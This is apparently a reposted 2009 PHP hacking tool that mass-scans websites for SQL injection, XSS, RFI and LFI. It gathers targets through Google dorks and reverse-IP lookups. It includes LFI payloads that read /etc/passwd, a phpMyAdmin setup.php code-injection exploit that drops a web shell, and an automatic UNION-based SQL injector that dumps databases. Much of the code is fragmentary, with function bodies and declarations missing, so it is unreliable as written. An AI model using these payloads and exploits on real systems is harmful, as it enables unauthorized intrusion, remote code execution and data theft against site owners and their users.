error_reporting(E_ALL & ~E_NOTICE);
Start();
function Start() {
$list_command = array('help','sql','rfi','lfi','xss','full','google','getlist','jump','exploit','wget','quit', 'pmapwn','injector','hexstring','md5string','portscan',);
print Logo();
Tips();
while(1) {
fwrite(STDOUT, "\n-CMD$: ");
$cmd = trim(fgets(STDIN));
if($cmd == 'full') {
fwrite(STDOUT, "\n-SITE: ");
$site = trim(fgets(STDIN));
if(empty($site)) {
print "[Error]Please enter site URL\n";
} else {
full($site);
}
} else {
if(in_array($cmd, $list_command)) {
$cmd();
} else {
echo "[Error]Command not found\n";
Tips();
}
}
}
}
function Logo() {
$text .= "|***************************************************************************************|\n";
$text .= " Website vulnerable scanner Tools 1.0 By XShimeX\n";
$text .= " Milw0rm Exploit Finder added by TweetyCoaster(Myanmar)\n";
$text .= " pmaPWN! - added by d3ck4, hackingexpose.blogspot.com\n";
$text .= " Greetz : d3ck4,XShimeX,TweetyCoaster,darkc0de,HM,TBDSec\n";
$text .= " 19th June 2009\n";
$text .= "|***************************************************************************************|\n";
$text .= "\n";
print $text;
}
function Help() {
$text .= "[sql] --------> Scan SQL Injection vulnerable\n";
$text .= "[xss] --------> Scan XSS(cross site scripting) vulnerable\n";
$text .= "[rfi] --------> Scan RFI(remote file include) vulnerable\n";
$text .= "[lfi] --------> Scan LFI(local file include) vulnerable\n";
$text .= "[pmapwn] -----> Scan phpMyAdmin code injection vulnerable\n";
$text .= "[full] -------> Grab link from website and start all scan\n";
$text .= "[google] -----> Grab website from google and start all scan\n";
$text .= "[getlist] ----> Grab website from file and start all scan\n";
$text .= "[jump] -------> Find all site hosted on same ip and start all scan\n";
$text .= "[exploit] ----> Milw0rm Exploit Finder\n";
$text .= "[injector] ---> Automatic SQL Injector, work for v4 and v5\n";
$text .= "[hexstring] --> Convert string to hex (useful for sql injection)\n";
$text .= "[md5string] --> Convert string to MD5 Hash\n";
$text .= "[portscan] --> Check port open and close\n";
$text .= "[wget] -------> Get file from URL\n";
print $text;
}
function Tips() {
print "[Tips] For help, type 'help' and to quit please type 'quit'\n";
}
function full($site) {
print "[-] Start full scanning mode.\n";
pmapwn($site, 1);
print "[-] Start SQL Injection Scan\n";
sql($site, 1);
print "[-] Start XSS Scan\n";
xss($site, 1);
print "[-] Start RFI Scan\n";
rfi($site, 1);
print "[-] Start LFI Scan\n";
lfi($site, 1);
}
function hexstring() {
fwrite(STDOUT, "-String: ");
$string = trim(fgets(STDIN));
print "[-] String: $string\n";
print "[-] Hex: ".HexValue($string)."\n";
}
function portscan() {
fwrite(STDOUT, "-IP/Domain: ");
$host = trim(fgets(STDIN));
fwrite(STDOUT, "-Start Port: ");
$sport = trim(fgets(STDIN));
fwrite(STDOUT, "-End Port: ");
$eport = trim(fgets(STDIN));
print "[-] IP/Domain : $host\n";
$sport = intval($sport);
$eport = intval($eport);
print "[-] Checking...\n";
for($i = $sport; $i <= $eport; $i++) {
$check = @fsockopen($host, $i, $errno, $errstr, 3);
if($check) {
print "[-] Port '$i' is open\n";
}
}
print "[-] Done\n";
}
function md5string() {
fwrite(STDOUT, "-String: ");
$string = trim(fgets(STDIN));
print "[-] String: $string\n";
print "[-] MD5: ".md5($string)."\n";
}
function jump() {
fwrite(STDOUT, "-SITE: ");
$site = trim(fgets(STDIN));
$request = parse_url($site);
$jump_site = "http://www.ip-adress.com/reverse_ip/$request[host]";
$pattern = "/href=\"\/whois\/(.*?)\">Who(.*?)/";
print "[-] URL : $request[host]\n";
print "[-] Path: $request[path]\n";
print "[-] Server IP: ".gethostbyname($request['host'])."\n";
print "[-] Get list domain hosted on the ip...\n";
$list = con_host($jump_site);
preg_match_all($pattern,$list, $links);
print "[-] Total site hosted on ".$request['host']." : ".count($links[1])."\n";
foreach($links[1] as $link) {
$link = "http://".$link;
save_log('domain_list.txt',"$link\n");
}
print "[-] Domain list save to 'domain_list.txt'\n";
foreach($links[1] as $link) {
$link = "http://".$link;
full($link);
joomla($link);
}
}
function google() {
fwrite(STDOUT, "-DORK: ");
$dork = trim(fgets(STDIN));
print "[-] Dork: $dork\n";
print "[-] Start google scanning...\n";
for($i = 0; $i <= 900; $i+=100) {
$fp = con_host("http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
@preg_match_all("/
/", $fp, $links);
print "[+] Total site found: $total\n";
print "[+] Done finding link on google\n";
print "[!] If you found this not working pls notify us!\n";
save_log('domain_list.txt',"http://".$real['host']."\n");
print "[-] Domain list save to 'domain_list.txt'\n";
$getfile = trim(fgets(STDIN));
$handle = fopen($getfile, "r");
if($content = con_host($site)) {
if(preg_match("/option=com_/", $content)) {
print "[-] Joomla site found: $site\n";
function lfi($site = '', $full = '0') {
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
print "[-] URL : $request[host]\n";
print "[-] Path: $request[path]\n";
print "[-] Try connect to host\n";
$url = "".$request['scheme']."://".$request['host'].$request['path']."";
print "[+] Connect to host successful\n";
print "[-] Finding link on the website\n";
print "[+] Found link : ".count(find_link($url))."\n";
print "[-] Finding vulnerable...\n";
foreach(find_link($url) as $link) {
$file = explode("/", $request['path']);
$request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
foreach($list_lfi as $error) {
$link = preg_replace("/=(.+)/", "=$error", $link);
if(preg_match("/root:x:/", con_host($link))) {
print "[-]LFI vulnerable : $link\n";
save_log('vulnerable.log', "".$link."\r\n");
print "[+] See 'vulnerable.log' for vulnerable list\n";
function sql($site = '', $full = '0') {
'You have an error in your SQL',
'supplied argument is not a valid MySQL result resource in',
'Microsoft JET Database','ODBC Microsoft Access Driver',
'Microsoft OLE DB Provider for SQL Server',
'Microsoft OLE DB Provider for Oracle',
'[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect',
print "[-] URL : $request[host]\n";
print "[-] Path: $request[path]\n";
print "[-] Try connect to host\n";
$url = "".$request['scheme']."://".$request['host'].$request['path']."";
print "[-] Connect to host successful\n";
print "[-] Finding link on the website\n";
print "[+] Found link : ".count(find_link($url))."\n";
print "[-] Finding vulnerable...\n";
foreach(find_link($url) as $link) {
$file = explode("/", $request['path']);
$request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
$link = preg_replace("/=(.+)/", "=1'", $link);
foreach($sql_error as $error) {
if(preg_match("/$error/", con_host($link))) {
print "[+] SQL Injection vulnerable : $link\n";
save_log('vulnerable.log', "".$link."\r\n");
print "[-] See 'vulnerable.log' for vulnerable list\n";
function rfi($site = '', $full = '0') {
print "[-] URL : $request[host]\n";
print "[-] Path: $request[path]\n";
print "[-] Try connect to host\n";
$url = "".$request['scheme']."://".$request['host'].$request['path']."";
print "[-] Connect to host successful\n";
print "[-] Finding link on the website\n";
print "[+] Found link : ".count(find_link($url))."\n";
print "[-] Finding vulnerable...\n";
foreach(find_link($url) as $link) {
$file = explode("/", $request['path']);
$request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
$link = preg_replace("/=(.+)/", "=http://google.com/index.html?", $link);
if(preg_match("/Advertising Programs/", con_host($link))) {
echo "[+] RFI vulnerable : $link\n";
save_log('vulnerable.log', "".$link."\r\n");
print "[+] See 'vulnerable.log' for vulnerable list\n";
print "[!] Connect to host failed\n";
function xss($site = '', $full = '0') {
print "[-] URL : $request[host]\n";
print "[-] Path: $request[path]\n";
print "[-] Try connect to host\n";
$url = "".$request['scheme']."://".$request['host'].$request['path']."";
print "[+] Connect to host successful\n";
print "[-] Finding link on the website\n";
print "[+] Found link : ".count(find_link($url))."\n";
print "[-] Finding vulnerable...\n";
foreach(find_link($url) as $link) {
$file = explode("/", $request['path']);
$request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
$link = preg_replace("/=(.+)/", "=
XSS_HERE
", $link);XSS_HERE/", con_host($link))) {
echo "[+] XSS vulnerable : $link\n";
save_log('vulnerable.log', "".$link."\r\n");
print "[+] See 'vulnerable.log' for vulnerable list\n";
print "[!] Connect to host failed\n";
added by tweetycoaster 17-06-2009
based on Bugs Exploit Finder V 1.0 2008 by DDOS
$url="http://www.milw0rm.com/search.php?dong=$script";
$dump=file_get_contents($url);
(.*?)#',$dump,$date);preg_match_all('#target="_blank" class="style14">(.*?)#',$dump,$exploit);
preg_match_all('#
#',$dump,$url);print "[+] Connected ! ! !\n";
for($i=0 ; $i < $lang ; $i++){
print "[+] Exploit Number : $d \n";
save_log('exploits.log', "[+]Exploit Number : $d \r\n");
print "[+] Exploit Name = ".$exploit[1][$i]."\n";
save_log('exploits.log', "[+]Exploit Name = ".$exploit[1][$i]."\r\n");
print "[+] Exploit URL = http://www.milw0rm.com".$url[1][$i]."\r\n";
save_log('exploits.log', "[+]Exploit URL = http://www.milw0rm.com".$url[1][$i]."\r\n");
print "[+] Exploit Date = ".$date[1][$i]."\n";
save_log('exploits.log', "[+]Exploit Date = ".$date[1][$i]."\r\n");
save_log('exploits.log', " ------------------------------- \r\n");
print "[+] See 'exploits.log' for details list\n";
function pmapwn($site = '', $full = '0') {
print "\n[!] pmaPWN! - phpMyAdmin Code Injection Exploit(PHP) by d3ck4\n\n";
print "[-] Site : ".$site."\n";
print "[-] Scanning phpMyAdmin, wait sec..\n";
phpmyadmin_scan_site($site.$path);
function phpmyadmin_scan_site($url) {
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
if (preg_match("/200 OK/", $result) and preg_match("/phpMyAdmin/", $result)) {
print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url." ]";
print "\n[-] Scanning vulnerable, wait sec..\n";
phpmyadmin_exploit_site($url);
function phpmyadmin_exploit_site($url) {
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_HEADER, 1);
curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
print "\n[-] Exploiting, wait sec..\n";
print "\n[-] Shit! no luck.. not vulnerable\n";
function phpmyadmin_exploit($w00t) {
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
curl_setopt($curl, CURLOPT_COOKIEFILE, "expoitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
print "\n[-] Sending evil payload mwahaha.. \n";
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_REFERER, $w00t);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
curl_setopt($curl, CURLOPT_COOKIEFILE, "expoitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
print "\n[!] w00t! w00t! You should now have shell here";
print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
save_log('pmashell.txt', $w00t."config/config.inc.php?c=id\r\n");
print "\n[!] Shit! no luck.. not vulnerable\n";
print "See 'pmashell.txt' for the list\n";
if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
fwrite(STDOUT, "\n-URL Ending (-- or /*): ");
if(!preg_match("/darkc0de/", $url)) {
print "[-] Please insert 'darkc0de' token on the URL\n";
print "[-] Example: http://site.com/news.php?id=darkc0de\n";
print "[-] Example: http://site.com/index.php?id=darkc0de&pg=news\n";
print "[%] Trying connect to host...\n";
print "[+] Connect to host successful\n";
print "[-] Finding column number...\n";
inject_get_column_num($url, $end);
print "[!] Connect to host failed\n";
function inject_get_column_num($url, $ending) {
for($i = 0; $i <= $max; $i++) {
$word .= "concat(0x6461726B63306465,0x3a,".str_repeat($i,1).",0x3a),";
$sql = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($word,",")."+$ending", $url);
if(preg_match("/darkc0de:(.*?):/i", con_host($sql), $val)) {
print "[-] Found column number: ".$i."\n";
print "[-] Null Number: ".$val[1]."\n";
save_log('injector.txt', "[-] Found column number: ".$i."\r\n");
save_log('injector.txt', "[-] Null Number: ".$val[1]."\r\n");
$col = str_replace($val[1], "darkc0de", $col);
$real = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($col,",")."+$ending", $rurl);
save_log('injector.txt', "[-] URL: ".$real."\r\n");
print "[-] Getting sql server information...\n";
foreach($info as $get => $val) {
print "[-] $get: $value[1]\n";
save_log('injector.txt', "[-] $get: $value[1]\r\n");
print "[-] Testing load file...\n";
$load = str_replace("darkc0de", "".$string."load_file(0x2f6574632f706173737764)", $rurl);
if(preg_match("/root:x:/", con_host($load))) {
print "[-] w00t w00t, you have permission to load file!\n";
save_log('injector.txt', "[-] w00t w00t, you have permission to load file!\r\n");
save_log('injector.txt', "[-] URL: $load\r\n");
print "[-] No permission to load file :( \n";
print "[-] MySQL Server version is : 5.x\n";
print "[-] Start extract the column and table...\n";
if(preg_match("/r0x:(.*?):r0x/", con_host($url), $totaltbl)) {
print "[-] Total Table Found: ".$totaltbl[1]."\n";
save_log('injector.txt', "[-] Total Table Found: ".$totaltbl[1]."\r\n");
for($i = 0; $i <= $totaltbl[1]; $i++) {
print "[-] Table: ".$table_name[1]."\n";
save_log('injector.txt', "[-] Table: ".$table_name[1]."\r\n");
print "[-] Total Column in ".$table_name[1].": ".$totalclm[1]."\n";
save_log('injector.txt', "[-] Total Column in ".$table_name[1].": ".$totalclm[1]."\r\n");
for($a = 0; $a <= $totalclm[1]; $a++) {
save_log('injector.txt', "".$column_name[1].",");
save_log('injector.txt', "\r\n");
print "[-] MySQL Server version is : 4.x\n";
print "[-] Start automatic column and table finder...\n";
print "[-] This may take a few minutes or hours to finish\n";
$url = str_replace("concat(0x696E6A336374)", "concat(0x6461726B63306465)", $rurl);
$url = str_replace($ending, "+from+".$table."+$ending", $url);
if(preg_match("/darkc0de/", con_host($url))) {
print "[$i] Found Table : $table\n";
save_log('injector.txt', "[-] Found Table : $table\r\n");
print "[-] Finding column...\n";
foreach($column_4 as $column) {
$url = str_replace("$ending", "+from+".$table."+$ending", $url);
if(preg_match("/darkc0de:(.*?):darkc0de/", con_host($url))) {
print "[-] Found column: $column\n";
save_log('injector.txt', "[-] Found column: $column\r\n");
save_log('injector.txt', "\r\n");
print "[-] Done searching column inside $table table\n";
print "[-] See 'injector.txt' to see the log\n";
for($i = 0; $i < strlen($text); $i++) {
$foo = system('wget',$link ,$output);
print "[+] Exit the program\n";
preg_match("/Content-Type:(.+)/", $info, $type);
preg_match("/Server:(.+)/", $info, $server);
print "[-] IP: ".gethostbyname($ip['host'])."\n";
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 200);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
$find = "/href=[\"']?([^\"']+)?[\"']?/i";
preg_match_all($find, $text, $links);
function save_log($fname = '', $text = '') {
$file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a');
$write = @fwrite($file, $text, '60000000');
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!